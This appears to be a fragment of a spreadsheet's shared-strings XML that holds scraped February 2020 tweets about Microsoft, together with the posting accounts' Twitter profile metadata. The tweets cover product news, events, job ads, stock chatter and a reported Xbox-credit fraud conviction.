  </si>
  <si>
    <t>{'id': 831171641468018689, 'id_str': '831171641468018689', 'name': 'Unboxing Treatment', 'screen_name': 'unbx_tech', 'location': '', 'description': 'A #tech website aiming to share unbiased user experiences to everyone through #unboxing and #review, as well as following latest tech news. #unboxingtreatment', 'url': 'https://t.co/4sx52cR7kD', 'entities': {'url': {'urls': [{'url': 'https://t.co/4sx52cR7kD', 'expanded_url': 'https://www.unboxingtreatment.com', 'display_url': 'unboxingtreatment.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 955, 'friends_count': 201, 'listed_count': 3, 'created_at': 'Mon Feb 13 16:02:16 +0000 2017', 'favourites_count': 33, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1013,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'http://pbs.twimg.com/profile_images/926884311084630016/lOQTSQRI_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/926884311084630016/lOQTSQRI_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/831171641468018689/1508342221', 'profile_link_color': 'CD0000',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</si>
  <si>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12:13:29 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Surface Duo will have a peek feature to quickly glance at information suggests a leaked video.
https://t.co/rUyoBGAP7e https://t.co/WCQBRZLyXr</t>
  </si>
  <si>
    <t>{'id': 1141601331196489728, 'id_str': '1141601331196489728', 'name': 'ohmyfind', 'screen_name': 'ohmyfind', 'location': 'India', 'description': 'Your One Search Stop https://t.co/PLakbEWcnE', 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/PLakbEWcnE', 'expanded_url': 'https://in.ohmyfind.com/', 'display_url': 'in.ohmyfind.com', 'indices': [21, 44]}]}}, 'protected': False, 'followers_count': 17, 'friends_count': 106, 'listed_count': 2, 'created_at': 'Thu Jun 20 06:59:02 +0000 2019', 'favourites_count': 17, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 459,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'http://pbs.twimg.com/profile_images/1141605241932193794/LBEUdf2v_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1141605241932193794/LBEUdf2v_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1141601331196489728/1561017177',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</si>
  <si>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12:11:12 +0000 2020</t>
  </si>
  <si>
    <t>IR35 reforms: IT contractors warned off joining non-compliant umbrellas to avoid loan charge risk https://t.co/EAQ1NkNMf3 via @Hybrid_Circle #Microsoft #Azure</t>
  </si>
  <si>
    <t>Thu Feb 27 12:08:36 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft CEO Satya Nadella said that #AI will be shaping the world in the next 10 years. The ultimate dream of AI is to have science do AI.
Must Read: CEO Of Microsoft Talks About Crucial Things That Will Change The Future Of India &amp;lt; https://t.co/Rq0Ncl3OZh &amp;gt; https://t.co/FtzgWWDmLh</t>
  </si>
  <si>
    <t>{'id': 745943567281983488, 'id_str': '745943567281983488', 'name': 'CIOReviewIndia', 'screen_name': 'CIOReview_India', 'location': 'Bengaluru, India', 'description': 'CIOReviewIndia is a technology magazine that talks about enterprise solutions that can redefine the business goals of enterprises tomorrow.', 'url': 'https://t.co/mtYXicnR2P', 'entities': {'url': {'urls': [{'url': 'https://t.co/mtYXicnR2P', 'expanded_url': 'http://www.cioreviewindia.com/', 'display_url': 'cioreviewindia.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 699, 'friends_count': 263, 'listed_count': 319, 'created_at': 'Thu Jun 23 11:36:20 +0000 2016', 'favourites_count': 1115, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2227, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1136136488574365696/_DeCKJW7_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1136136488574365696/_DeCKJW7_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/745943567281983488/1559711776',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</si>
  <si>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12:06:28 +0000 2020</t>
  </si>
  <si>
    <t>Calling Magic !
How user Interface works ?
#MicrosoftTeams #Microsoft #SurfaceDuo https://t.co/ypWbrYSfSH</t>
  </si>
  <si>
    <t>{'id': 1707566635, 'id_str': '1707566635', 'name': 'Nishant Pathak', 'screen_name': 'NishantBareilly', 'location': 'Bareilly, India', 'description': 'Social Media Influencer.!.\n#Leaker\n#Smartphones And Gadgets Lover,Trusted Reviews,For Tips and InQueries , Please Contact Via Direct Message.ðŸ§‘', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 975, 'friends_count': 864, 'listed_count': 1, 'created_at': 'Wed Aug 28 15:09:33 +0000 2013', 'favourites_count': 7218, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3144,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'http://pbs.twimg.com/profile_images/1220930408675758082/v_I8z60s_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1220930408675758082/v_I8z60s_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1707566635/1581696673',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</si>
  <si>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12:05:41 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft issues #financial warning due to as #coronavirus disruption https://t.co/sc4p4NImgY via @MailOnline
#bigdata 
#healthCare
@Chidambara09 #linux #china#usa #google #youtube
#Coronavirus
#Wuhanvirus #China #Covid_19
#COVID19
#USA #UK #London #Espana 
#business #uksnow</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</si>
  <si>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927202,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</si>
  <si>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12:05:35 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Pushes Windows 10 Insider Preview Build 19569 https://t.co/fdNdh9Y9pu #microsoft #WindowsInsiders #windows #windows10</t>
  </si>
  <si>
    <t>Thu Feb 27 12:05:01 +0000 2020</t>
  </si>
  <si>
    <t>As the saying goes crime doesn't pay: Game over, man: Microsoft test engineer who laundered stolen Xbox credits into $10m guilty of fraud
https://t.co/WvRsMyA83B #gaming #Xbox #fraud #tokens #Microsoft</t>
  </si>
  <si>
    <t>{'id': 3191025717, 'id_str': '3191025717', 'name': 'Darren Ewers', 'screen_name': 'DarrenEwers', 'location': 'London, England', 'description': 'Self-made CEO of #Fintech company Pro Capitalist, Free Markets, Centre Politics. The problems of the world can be solved through entrepreneurship #FBPE @ManUtd', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2387, 'friends_count': 2847, 'listed_count': 97, 'created_at': 'Tue Apr 21 14:57:05 +0000 2015', 'favourites_count': 12530, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 20148,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'http://pbs.twimg.com/profile_images/631831155231322112/Z3cI13po_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/631831155231322112/Z3cI13po_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3191025717/1467991751', 'profile_link_color': 'B7BEC5',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</si>
  <si>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12:03:42 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft to force Bing on Chrome users in the enterprise https://t.co/19A4FRw59p via @computerworld</t>
  </si>
  <si>
    <t>{'id': 1195392515031097346, 'id_str': '1195392515031097346', 'name': 'Jump Browser - the new way of surfing internet!', 'screen_name': 'JumpBrowser', 'location': '', 'description': 'Smart #Chrome alternative = JUMP. Our #browser is here to make your #internet browsing experiences safe and #adsfree! #startup #adsblocker #jumpbrowser', 'url': 'https://t.co/RvAK4vdKQP', 'entities': {'url': {'urls': [{'url': 'https://t.co/RvAK4vdKQP', 'expanded_url': 'https://jump-browser.com', 'display_url': 'jump-browser.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 122, 'friends_count': 259, 'listed_count': 0, 'created_at': 'Fri Nov 15 17:26:43 +0000 2019', 'favourites_count': 63,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'http://pbs.twimg.com/profile_images/1196156724266311684/SFftl1s3_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1196156724266311684/SFftl1s3_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1195392515031097346/1574023963',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</si>
  <si>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12:03:03 +0000 2020</t>
  </si>
  <si>
    <t>@EnghouseInterac will be attending Call and Contact Centre Expo with key partner @4netTech, 18-19 March. Get your free ticket. Visit us on stand 2050 where we will be talking about our contact centre for Microsoft Teams.
#Teams @CallCentreEx #Microsoft
 https://t.co/qHKVWsdso8</t>
  </si>
  <si>
    <t>Thu Feb 27 12:02:45 +0000 2020</t>
  </si>
  <si>
    <t>Watch how @wildandwolf went from a reactive company that put out fires to proactively anticipating and acting on the needs of their customers.    #MSDyn365 #Microsoft #Technology #IT #BusinessAutomation https://t.co/LLyvcDANd5</t>
  </si>
  <si>
    <t>Thu Feb 27 12:01:03 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> New event alert 
Join us at Microsoft's UK HQ on the 25th of March to learn more about the future of knowledge with Office 365!
 https://t.co/8cGDahzQ7Q https://t.co/8cGDahzQ7Q
#microsoft #knowledge #knowledgemanagement #O365</t>
  </si>
  <si>
    <t>Thu Feb 27 12:00:53 +0000 2020</t>
  </si>
  <si>
    <t>Sign up for next weeks FREE webinar  How can you protect and backup your Office 365 Data? #Webinar #Data #Office365 #Microsoft #Productivity #Datarecovery
Sign up here  https://t.co/H8k5T6SOqF https://t.co/a3IMa2XKtk</t>
  </si>
  <si>
    <t>Thu Feb 27 12:00:05 +0000 2020</t>
  </si>
  <si>
    <t>Q: Is #Microsoft #Bing pay-per-click advertising cheaper than #Google #Ads? A: https://t.co/tKwn7saZVD #PPC #advertising https://t.co/pcQn9JLaBS</t>
  </si>
  <si>
    <t>{'id': 905131609963319296, 'id_str': '905131609963319296', 'name': 'Euro Digital Partners', 'screen_name': 'EuDigitalP', 'location': 'Prague, Czech Republic', 'description': 'Thinking Differently', 'url': 'https://t.co/HQthAZKoem', 'entities': {'url': {'urls': [{'url': 'https://t.co/HQthAZKoem', 'expanded_url': 'http://www.eurodigitalpartners.com/insights', 'display_url': 'eurodigitalpartners.com/insights', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 27, 'friends_count': 125, 'listed_count': 2, 'created_at': 'Tue Sep 05 18:12:47 +0000 2017', 'favourites_count': 11, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 557,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'http://pbs.twimg.com/profile_images/975828858103623680/alE8gpxX_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/975828858103623680/alE8gpxX_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/905131609963319296/1521491474',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</si>
  <si>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12:00:00 +0000 2020</t>
  </si>
  <si>
    <t>81% of workforces are anticipated to reach breaking point by 2020, if they do not tap #automation to handle the volume of tasks being generated.  If your organisation is struggling, Jumar can help.  To find out about #microsoft #powerautomate contact: https://t.co/XXxOTZf71Q https://t.co/VcnK7SwxDd</t>
  </si>
  <si>
    <t>{'id': 20137136, 'id_str': '20137136', 'name': 'Jumar Technology', 'screen_name': 'JumarTechnology', 'location': 'Birmingham, UK', 'description': 'Business technology specialists. Helping you exploit cloud and data technologies to gain competitive advantage throughout your business', 'url': 'https://t.co/UJOXP5Xr1P', 'entities': {'url': {'urls': [{'url': 'https://t.co/UJOXP5Xr1P', 'expanded_url': 'http://www.jumar-technology.com', 'display_url': 'jumar-technology.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 612, 'friends_count': 402, 'listed_count': 20, 'created_at': 'Thu Feb 05 10:50:24 +0000 2009', 'favourites_count': 83, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2183,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'http://pbs.twimg.com/profile_images/910903436819955713/cLobIzuF_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/910903436819955713/cLobIzuF_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/20137136/1506011302',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</si>
  <si>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11:58:10 +0000 2020</t>
  </si>
  <si>
    <t>In order to grab more business from enterprises and away from #Amazon (AWS) and #Microsoft, #Google Cloud needs to make moves like this to strengthen their relationships with partners. 
https://t.co/IRCmY1qT0x via @WSJ</t>
  </si>
  <si>
    <t>Thu Feb 27 11:56:17 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Announces a $1.1 Billion Investment Plan to Drive Digital Transformation in Country Including Its First #CloudDatacenter Region https://t.co/wpv9JhHdKj
Please follow me on Twitter - TU 
#Technology #DigitalInnovation  #E-Commerce #innovation #DigitalTransformation https://t.co/uFwYwx4wmH</t>
  </si>
  <si>
    <t>Thu Feb 27 11:53:06 +0000 2020</t>
  </si>
  <si>
    <t>Salesforces #CRM vs #Microsoft Dynamics 365: Lets compare
https://t.co/c3CE6Q2nwg
#Salesforce https://t.co/5JRkWvnpor</t>
  </si>
  <si>
    <t>{'id': 1169125848181551104, 'id_str': '1169125848181551104', 'name': 'Shikha Sharma', 'screen_name': 'ShikhaS50060849', 'location': '', 'description': 'Digital Marketing Consultant at a company in New delhi.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 12, 'friends_count': 21, 'listed_count': 0, 'created_at': 'Wed Sep 04 05:51:48 +0000 2019', 'favourites_count': 218, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 167, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1169125934575828992/_qmqVzyA_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1169125934575828992/_qmqVzyA_normal.jpg',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</si>
  <si>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11:52:34 +0000 2020</t>
  </si>
  <si>
    <t>We're back in the office after a great few days at the Microsoft Ignite Prague event.
Were you there? It would be great to connect.
#MicrosoftIgnite #Microsoft #TechEvent https://t.co/uavk5vRscw</t>
  </si>
  <si>
    <t>{'id': 1001776219401216001, 'id_str': '1001776219401216001', 'name': 'ClearCloud', 'screen_name': 'ClearCloudUK', 'location': 'Manchester, England', 'description': 'Empowering businesses to leverage public #cloud in a manner which controls cost, ensures security, provides reliability &amp; scalability. ðŸ“ž 0161 215 4040', 'url': 'https://t.co/Vhdc07Sn2Z', 'entities': {'url': {'urls': [{'url': 'https://t.co/Vhdc07Sn2Z', 'expanded_url': 'https://www.clearcloud.co.uk', 'display_url': 'clearcloud.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 106, 'friends_count': 484, 'listed_count': 1, 'created_at': 'Wed May 30 10:43:57 +0000 2018', 'favourites_count': 86, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 112,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'http://pbs.twimg.com/profile_images/1031532757283950593/sTxUjc0L_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1031532757283950593/sTxUjc0L_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1001776219401216001/1568642391',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</si>
  <si>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11:51:48 +0000 2020</t>
  </si>
  <si>
    <t>A documentary I will soon get to watch on #Netflix 
#Microsoft #Bitcoin 
https://t.co/LhgeQgLO7j via @coindesk</t>
  </si>
  <si>
    <t>Thu Feb 27 11:48:41 +0000 2020</t>
  </si>
  <si>
    <t>#Seattle District #Court found #Microsoft ex-tester Volodymyr #Kvashuk guilty of organizing a fraudulent scheme using #crypto.
 https://t.co/0FoGLOmHBc
#fraud #crime #Bitcoin #BTC #cryptocurrency #blockchain</t>
  </si>
  <si>
    <t>{'id': 1041634939169468416, 'id_str': '1041634939169468416', 'name': 'WEB MASTERMIND YTðŸŒªðŸ‡®ðŸ‡³', 'screen_name': 'WEBMASTERMIND1', 'location': 'Chandigarh,India', 'description': 'Founder - WebMastermind YT Channel ðŸ”´\n ðŸ‡®ðŸ‡³https://t.co/bo4ueWH8rD ðŸ‡®ðŸ‡³\n\nProud to be a Crypto Punjabi â™¥ï¸\n\nEthereum Love\n0x158c031106999C9c07455b32002ef354a0E70304', 'url': 'https://t.co/hGBhWXWGRF', 'entities': {'url': {'urls': [{'url': 'https://t.co/hGBhWXWGRF', 'expanded_url': 'https://www.youtube.com/channel/UCAxFbY0Xqvd67GwVGFrJI8Q', 'display_url': 'youtube.com/channel/UCAxFbâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/bo4ueWH8rD', 'expanded_url': 'http://cryptonewshindi.com', 'display_url': 'cryptonewshindi.com', 'indices': [40, 63]}]}}, 'protected': False, 'followers_count': 833, 'friends_count': 263, 'listed_count': 2, 'created_at': 'Mon Sep 17 10:28:16 +0000 2018', 'favourites_count': 3663, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2110,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'http://pbs.twimg.com/profile_images/1219226851362537473/jvUu8Wiq_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1219226851362537473/jvUu8Wiq_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1041634939169468416/1572251234',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</si>
  <si>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11:48:10 +0000 2020</t>
  </si>
  <si>
    <t>So the next generation consoles are going to be looking at streaming your games online. Which for me is a drawback Australia has absolutely shocking internet speeds and Id rather not rely on the cloud. #Sony #Microsoft #PS5 #XboxSeriesX #XboxOneX #PS4Pro #Australia #Internet</t>
  </si>
  <si>
    <t>{'id': 926621880865341441, 'id_str': '926621880865341441', 'name': 'ð“™ð“¾ð“¼ð“½ð“²ð“· ð“’ð“»ð“¸ð“¼ð“®ð“»', 'screen_name': 'justincroser', 'location': 'Adelaide, Australia', 'description': 'I tweet my thoughts ðŸ’­ Lover of sports âš½ï¸ðŸðŸ‰ðŸˆðŸ¥Š RT â‰  endorsements. #AFC ðŸ”´âšªï¸ðŸ”´ #GoonerFamily #COYG #WeAreGeelong', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2463, 'friends_count': 2538, 'listed_count': 2, 'created_at': 'Sat Nov 04 01:27:27 +0000 2017', 'favourites_count': 11, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 172,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'http://pbs.twimg.com/profile_images/1230761130961694720/EVEApv5C_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1230761130961694720/EVEApv5C_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/926621880865341441/1583068542', 'profile_link_color': '184CF5',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</si>
  <si>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11:47:35 +0000 2020</t>
  </si>
  <si>
    <t>Taking this  to a new level. And this time, we brought our friends from @SevOneInc and @ParkMyCloud with us... #Cloud #Kubernetes #DevOps #microservices #containers #Cisco #Microsoft #AWS #IBM #Google https://t.co/yRWji0redp</t>
  </si>
  <si>
    <t>{'id': 49654545, 'id_str': '49654545', 'name': 'Jason Shaw', 'screen_name': 'jasonbshaw', 'location': 'Newmarket, Ontario, Canada', 'description': 'Father, husband, dance dad, avid endurance athlete, Blue Jays fan! Member of #turbonation', 'url': 'https://t.co/0WsCRIK96S', 'entities': {'url': {'urls': [{'url': 'https://t.co/0WsCRIK96S', 'expanded_url': 'http://turbonomic.com', 'display_url': 'turbonomic.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 81, 'friends_count': 364, 'listed_count': 6, 'created_at': 'Mon Jun 22 15:05:32 +0000 2009', 'favourites_count': 447, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1579,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'http://pbs.twimg.com/profile_images/782349109495730176/C-SoLH3t_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/782349109495730176/C-SoLH3t_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/49654545/1473297079',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</si>
  <si>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11:44:16 +0000 2020</t>
  </si>
  <si>
    <t>Xbox Wireless Controller - Gears 5 Kait Diaz Limited Edition
 Ora: 49.98 | Prima: 60.00
 Prezzo medio 30gg: 64.28
Link: https://t.co/TyxMzONaiE  
#Microsoft #Xbox https://t.co/ayNluZfo12</t>
  </si>
  <si>
    <t>{'id': 2447780360, 'id_str': '2447780360', 'name': 'Reprice App - su Google Play Store', 'screen_name': 'offertagiorno', 'location': '', 'description': 'Segnaliamo ogni giorno le migliori offerte Amazon per le categorie "Elettronica e Informatica". Promuoviamo solo prodotti con buone e numerose recensioni.', 'url': 'https://t.co/8PcmjDIMdN', 'entities': {'url': {'urls': [{'url': 'https://t.co/8PcmjDIMdN', 'expanded_url': 'https://play.google.com/store/apps/details?id=com.offertadelgiorno.offertadelgiorno&amp;hl=it', 'display_url': 'play.google.com/store/apps/detâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1574, 'friends_count': 1994, 'listed_count': 10, 'created_at': 'Wed Apr 16 18:41:38 +0000 2014', 'favourites_count': 8, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 10060,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'http://pbs.twimg.com/profile_images/1098962635918323713/RrEt7Dt8_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1098962635918323713/RrEt7Dt8_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2447780360/1535784864',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</si>
  <si>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11:43:10 +0000 2020</t>
  </si>
  <si>
    <t>https://t.co/HtczoS8JJG 
#Migrate to SharePoint from all the Latest #OnlineSharePoint Platforms Using Saketa #SharePoint. 
#Migrationtool #branding #office #microsoft #digitaltransformation</t>
  </si>
  <si>
    <t>Thu Feb 27 11:41:25 +0000 2020</t>
  </si>
  <si>
    <t>This are my two levels where i will catch falling $MSFT.
#StockMarket #stocks #investing #MicrosoftTeams #microsoft #Dividends #DividendInvesting #dividend #Marketing #NASDAQ $usa https://t.co/wEM8I8i64i</t>
  </si>
  <si>
    <t>{'id': 4154662427, 'id_str': '4154662427', 'name': '$Crypto$', 'screen_name': 'lamelnaspojka19', 'location': '', 'description': "Past experience in BTC and other crypto currency's trading. Basics knowledge on Technical Analysis.\nAlso a Mechanical Engineer.", 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 158, 'friends_count': 57, 'listed_count': 0, 'created_at': 'Tue Nov 10 06:45:16 +0000 2015', 'favourites_count': 286, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1120,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'http://pbs.twimg.com/profile_images/914513315086422017/49ek38of_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/914513315086422017/49ek38of_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4154662427/1506871938',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</si>
  <si>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11:40:06 +0000 2020</t>
  </si>
  <si>
    <t>Thu Feb 27 11:40:02 +0000 2020</t>
  </si>
  <si>
    <t>In the shadow of #Amazon and #Microsoft, Seattle #startups are having a moment  TechCrunch https://t.co/Aq9KWNZuGM #TechJunkieNews https://t.co/F16NnwTNCq</t>
  </si>
  <si>
    <t>{'id': 3064266184, 'id_str': '3064266184', 'name': 'Tech Junkie', 'screen_name': 'techjunkiejh', 'location': '', 'description': 'https://t.co/mVXNWwBD1G , promoter of coding. Coding should be fun. How you think is just as important as what you think. News,games,Movies,TV, invest junkie', 'url': 'https://t.co/IAUcQUfG4o', 'entities': {'url': {'urls': [{'url': 'https://t.co/IAUcQUfG4o', 'expanded_url': 'http://www.techjunkieblog.com', 'display_url': 'techjunkieblog.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/mVXNWwBD1G', 'expanded_url': 'http://techjunkieblog.com', 'display_url': 'techjunkieblog.com', 'indices': [0, 23]}]}}, 'protected': False, 'followers_count': 29059, 'friends_count': 25178, 'listed_count': 6470, 'created_at': 'Fri Feb 27 00:58:22 +0000 2015', 'favourites_count': 14066, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 257182,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'http://pbs.twimg.com/profile_images/587160065536299009/9MBFPj6a_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/587160065536299009/9MBFPj6a_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3064266184/1465744133',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</si>
  <si>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11:32:42 +0000 2020</t>
  </si>
  <si>
    <t>I downloaded the new #Microsoft Edge #browser .. Not bad! 
https://t.co/27BuI2LX4j https://t.co/wQZA3LtTxM</t>
  </si>
  <si>
    <t>{'id': 985235732171239432, 'id_str': '985235732171239432', 'name': 'eilande', 'screen_name': 'EilandeTweets', 'location': 'Lombardia, Italia', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 22, 'friends_count': 111, 'listed_count': 0, 'created_at': 'Sat Apr 14 19:17:58 +0000 2018', 'favourites_count': 181, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 176,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'http://pbs.twimg.com/profile_images/1224534606332014592/y2AOlV08_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1224534606332014592/y2AOlV08_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/985235732171239432/1579906087',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</si>
  <si>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11:30:27 +0000 2020</t>
  </si>
  <si>
    <t>Watch our VP of Marketing, Jeremy Payne, as he talks with Henrik Bystrom, Business Area Manager at #Microsoft about the impact #AI is having in the #contactcentre and how it complements existing operations. #bots #robots #automation #insight https://t.co/7qcWv6nFtW</t>
  </si>
  <si>
    <t>Thu Feb 27 11:30:22 +0000 2020</t>
  </si>
  <si>
    <t>(17 years ago) Connectix Virtual Machine Tech Sold to Microsoft https://t.co/0JKoYyTNkc #microsoft https://t.co/aGjUiJ9zg4</t>
  </si>
  <si>
    <t>Thu Feb 27 11:25:34 +0000 2020</t>
  </si>
  <si>
    <t>Azure Load Balancer TCP resets on idle timeout is now available
- bidirectional TCP resets on idle timeout for load balancing rules
https://t.co/SNhkeDunCn
#Azure #Microsoft #Cloud #Networking #LoadBalancer https://t.co/0kyocVyviU</t>
  </si>
  <si>
    <t>Thu Feb 27 11:21:51 +0000 2020</t>
  </si>
  <si>
    <t>Dear @msonenote, you guys NEED an easy way to access sticky notes on Android, whether it's a shortcut to that section in OneNote or a separate app. I (and I've seen others) use Google Keep as it's a lot quicker for quick notes as opposed to OneNote. Thanks! #Microsoft #OneNote</t>
  </si>
  <si>
    <t>{'id': 1123915187055144961, 'id_str': '1123915187055144961', 'name': 'Daniel Lalonde', 'screen_name': 'keyofdan', 'location': 'Canada', 'description': 'Father, husband, musician, geek and Web Developer', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 55, 'friends_count': 148, 'listed_count': 0, 'created_at': 'Thu May 02 11:40:36 +0000 2019', 'favourites_count': 2266, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1012, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1235361002872606720/KXnB5Sdt_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235361002872606720/KXnB5Sdt_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1123915187055144961/1556843238',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</si>
  <si>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11:18:34 +0000 2020</t>
  </si>
  <si>
    <t>"development on GitHub." (which is proprietary and #microsoft owned) https://t.co/px5JBonw0u</t>
  </si>
  <si>
    <t>Thu Feb 27 11:16:01 +0000 2020</t>
  </si>
  <si>
    <t>Wanna be a Microsoft Azure Developer at @capitaplc working remotely? #dev #microsoft #digitalnomad  https://t.co/z2IwDGeD1K</t>
  </si>
  <si>
    <t>{'id': 2938471462, 'id_str': '2938471462', 'name': 'Remote OKÂ®', 'screen_name': 'RemoteOK', 'location': '', 'description': 'ðŸŒðŸ‘©\u200dðŸ’» Find your remote job and work from anywhere ðŸ‘‰ https://t.co/H4tv5nSjcg. ðŸ’ Sponsored by @safetywing.', 'url': 'https://t.co/w6AtUyoXBr', 'entities': {'url': {'urls': [{'url': 'https://t.co/w6AtUyoXBr', 'expanded_url': 'http://remoteok.io', 'display_url': 'remoteok.io', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/H4tv5nSjcg', 'expanded_url': 'http://remoteok.io/remote-jobs', 'display_url': 'remoteok.io/remote-jobs', 'indices': [51, 74]}]}}, 'protected': False, 'followers_count': 34078, 'friends_count': 0, 'listed_count': 509, 'created_at': 'Tue Dec 23 16:06:07 +0000 2014', 'favourites_count': 5414, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 20528,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'http://pbs.twimg.com/profile_images/547545586811932672/lQ1tXqL0_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/547545586811932672/lQ1tXqL0_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2938471462/1511966854', 'profile_link_color': '1E7FBF',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</si>
  <si>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11:14:35 +0000 2020</t>
  </si>
  <si>
    <t>Learn how to administer, configure, and produce/deliver Microsoft Teams Live Events today at 12 noon eastern! #microsoft #microsoftteams #microsoftstream #webcast https://t.co/1MovmfRDAs</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</si>
  <si>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33090, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 62433,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</si>
  <si>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Feb 27 11:14:00 +0000 2020</t>
  </si>
  <si>
    <t>Google Earth now works in Microsoft Edge, Firefox and Opera browsers https://t.co/g2SZpw3bVC #microsoft #feedly</t>
